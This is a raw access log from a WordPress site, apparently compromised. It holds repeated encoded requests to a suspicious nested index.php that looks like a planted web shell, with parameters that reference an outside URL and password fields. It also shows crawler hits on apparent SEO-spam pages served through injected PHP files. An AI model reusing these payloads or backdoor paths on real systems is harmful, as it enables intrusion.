95.108.213.245 - - [30/Oct/2025:07:02:51 +1000] "GET /robots.txt HTTP/1.1" 200 77 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
157.55.39.200 - - [30/Oct/2025:07:02:51 +1000] "GET /metalloprokat/page/14/ HTTP/2.0" 200 25154 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
66.249.69.128 - - [30/Oct/2025:07:02:56 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/X-HY-1.php?shopbrand/49550016.shtm HTTP/1.1" 200 24292 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.16.195.25 - - [30/Oct/2025:07:02:57 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737353232372p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313737313632372q3463353066316233623362383638653562633131666161316233383634346337222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
66.249.69.128 - - [30/Oct/2025:07:03:01 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-styles.php?product_archives HTTP/1.1" 200 26955 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
14.234.77.108 - - [30/Oct/2025:07:03:05 +1000] "GET /shopbrand/491610482.shtm HTTP/1.1" 200 5776 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36"
66.249.69.128 - - [30/Oct/2025:07:03:06 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-duotone.php?shopbrand/51235531.shtm HTTP/1.1" 200 25219 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
177.24.161.46 - - [30/Oct/2025:07:03:10 +1000] "GET /shopbrand/2415998.shtm HTTP/1.1" 200 5777 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
66.249.69.128 - - [30/Oct/2025:07:03:12 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/X-HY-1.php?shopbrand/49533668.shtm HTTP/1.1" 200 24834 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.16.195.25 - - [30/Oct/2025:07:03:24 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737353235342p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313737313635342q3635336433363936303164373438613438373561653439313636656432633863222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
66.249.69.128 - - [30/Oct/2025:07:03:27 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/X-HY-1.php?shopbrand/49530962.shtm HTTP/1.1" 200 25410 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:03:41 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-duotone.php?shopbrand/47439771.shtm HTTP/1.1" 200 24008 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:03:43 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-styles.php?shopbrand/47658944.shtm HTTP/1.1" 200 24335 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:03:47 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-styles.php?toreka/goods_menu.html HTTP/1.1" 200 26650 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.16.195.25 - - [30/Oct/2025:07:03:51 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737353238312p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313737313638312q6634353838343166653930353062336235396630326434346532373834653364222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
66.249.69.128 - - [30/Oct/2025:07:04:02 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/X-HY-1.php?shopbrand/49526721.shtm HTTP/1.1" 200 24783 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:04:08 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-styles.php?shopbrand/47646833.shtm HTTP/1.1" 200 25997 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.16.195.25 - - [30/Oct/2025:07:04:19 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737353330392p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313737313730392q6636663066626434333835336561613434653038336264313264303034316236222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
66.249.69.128 - - [30/Oct/2025:07:04:21 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-duotone.php?toiawase HTTP/1.1" 200 24830 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:04:23 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-styles.php?shopbrand/47668627.shtm HTTP/1.1" 200 27030 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:04:27 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/xmlrpc.php?shopbrand/53860641.shtm HTTP/1.1" 200 24930 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:04:29 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/X-HY-1.php?shopbrand/49547454.shtm HTTP/1.1" 200 26053 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:04:43 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-styles.php?shopbrand/47649435.shtm HTTP/1.1" 200 25567 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.16.195.25 - - [30/Oct/2025:07:04:47 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737353333372p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313737313733372q6631633036363064376235373237636365616162353462303735376563363834222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
66.249.69.128 - - [30/Oct/2025:07:04:57 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-styles.php?affiliate HTTP/1.1" 200 25883 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:05:03 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/X-HY-1.php?shopbrand/49530824.shtm HTTP/1.1" 200 24040 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:05:16 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/X-HY-1.php?shopbrand/49529597.shtm HTTP/1.1" 200 24953 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.16.195.25 - - [30/Oct/2025:07:05:20 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737353337302p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313737313737302q6563346536326138633434326664393066333164633235643262333935626566222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
66.249.69.128 - - [30/Oct/2025:07:05:28 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/X-HY-1.php?shopbrand/49536400.shtm HTTP/1.1" 200 26265 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:05:42 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-styles.php?shopbrand/47664552.shtm HTTP/1.1" 200 26546 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.16.195.25 - - [30/Oct/2025:07:05:49 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737353339392p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313737313739392q3136363538323334396630393939383338303262666563356330613934623730222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
66.249.69.128 - - [30/Oct/2025:07:05:55 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/X-HY-1.php?shopbrand/49526891.shtm HTTP/1.1" 200 24137 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.2.4.96 - - [30/Oct/2025:07:06:01 +1000] "GET /wp-login.php HTTP/1.1" 200 5819 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
185.2.4.96 - - [30/Oct/2025:07:06:04 +1000] "POST /wp-login.php HTTP/1.1" 200 5809 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
66.249.69.128 - - [30/Oct/2025:07:06:09 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-styles.php?man/kaitori/kantan.html HTTP/1.1" 200 26266 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.129 - - [30/Oct/2025:07:06:18 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/X-HY-1.php?shopbrand/49544578.shtm HTTP/1.1" 200 24217 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.16.195.25 - - [30/Oct/2025:07:06:19 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737353432392p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313737313832392q3263343262616666316534366230326362386362313737396332396131313864222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
66.249.69.128 - - [30/Oct/2025:07:06:22 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/X-HY-1.php?shopbrand/53849627.shtm HTTP/1.1" 200 25620 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:06:28 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-duotone.php?shopbrand/47439062.shtm HTTP/1.1" 200 26335 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
213.180.203.159 - - [30/Oct/2025:07:06:31 +1000] "GET /bordjury/?yadirect= HTTP/1.1" 200 5812 "-" "Mozilla/5.0 (compatible; YaDirectFetcher/1.0; +http://yandex.com/bots) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0"
66.249.69.128 - - [30/Oct/2025:07:06:34 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/X-HY-1.php?shopbrand/53847537.shtm HTTP/1.1" 200 24373 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:06:38 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-meta-query.php?shopbrand/48765756.shtm HTTP/1.1" 200 26664 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:06:39 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-meta-query.php?avsoft.html HTTP/1.1" 200 26258 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:06:43 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-activate.php?shopbrand/53650154.shtm HTTP/1.1" 200 27796 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:06:46 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/X-HY-1.php?shopbrand/53839239.shtm HTTP/1.1" 200 26353 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:06:48 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/index56214.php?shopbrand/1406921185.shtm HTTP/1.1" 200 24304 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.16.195.25 - - [30/Oct/2025:07:06:50 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737353436302p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313737313836302q3136383132363134346338353533356431393362333933383166393066626466222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
66.249.69.128 - - [30/Oct/2025:07:06:53 +1000] "GET /shopbrand/1215948576.shtm HTTP/1.1" 200 23281 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:06:56 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/X-HY-1.php?shopbrand/53851640.shtm HTTP/1.1" 200 27965 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.130 - - [30/Oct/2025:07:07:11 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/X-HY-1.php?shopbrand/53846895.shtm HTTP/1.1" 200 25128 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.129 - - [30/Oct/2025:07:07:15 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/X-HY-1.php?shopbrand/53838717.shtm HTTP/1.1" 200 24885 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.16.195.25 - - [30/Oct/2025:07:07:18 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737353438382p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313737313838382q3836353462336333633263363931316531663433633633313139306361316138222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
66.249.69.128 - - [30/Oct/2025:07:07:28 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/X-HY-1.php?shopbrand/53841449.shtm HTTP/1.1" 200 26248 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:07:32 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-duotone.php?shopbrand/47423423.shtm HTTP/1.1" 200 27764 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:07:38 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/X-HY-1.php?shopbrand/53843342.shtm HTTP/1.1" 200 27389 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.16.195.25 - - [30/Oct/2025:07:07:46 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737353531362p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313737313931362q3265376134366435336531613930303165323562376136343563373837666362222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
66.249.69.128 - - [30/Oct/2025:07:07:50 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/X-HY-1.php?shopbrand/53853698.shtm HTTP/1.1" 200 26240 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:08:04 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/X-HY-1.php?shopbrand/53840594.shtm HTTP/1.1" 200 24565 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:08:08 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/X-HY-1.php?shopbrand/49812575.shtm HTTP/1.1" 200 24479 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.16.195.25 - - [30/Oct/2025:07:08:14 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737353534342p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313737313934342q3532326236363634653166663933346637663733663263363864653431633463222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
66.249.69.128 - - [30/Oct/2025:07:08:21 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-meta-query.php?shopbrand/48739558.shtm HTTP/1.1" 200 26797 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:08:21 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/X-HY-1.php?shopbrand/49809177.shtm HTTP/1.1" 200 25620 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:08:35 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/X-HY-1.php?shopbrand/49808322.shtm HTTP/1.1" 200 24994 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
